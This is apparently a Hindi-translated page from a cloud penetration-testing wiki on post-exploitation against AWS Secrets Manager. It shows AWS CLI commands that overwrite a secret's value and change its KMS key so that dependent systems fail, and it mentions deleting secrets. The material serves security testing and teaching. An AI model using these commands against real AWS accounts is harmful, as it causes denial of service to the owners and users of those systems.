AWS - Secrets Manager Post Exploitation
Secrets Manager
अधिक जानकारी के लिए देखें:
pageAWS - Secrets Manager Enumरहस्य पढ़ें
रहस्य स्वयं संवेदनशील जानकारी हैं, privesc पेज देखें उन्हें पढ़ने का तरीका जानने के लिए।
DoS रहस्य मूल्य बदलें
रहस्य के मूल्य को बदलकर आप उस सभी सिस्टम को DoS कर सकते हैं जो उस मूल्य पर निर्भर करते हैं।
ध्यान दें कि पिछले मूल्य भी संग्रहीत होते हैं, इसलिए पिछले मूल्य पर वापस जाना आसान है।
```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### DoS KMS कुंजी में परिवर्तन ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS सीक्रेट को डिलीट करना
सीक्रेट को डिलीट करने के लिए न्यूनतम दिन 7 हैं
Last updated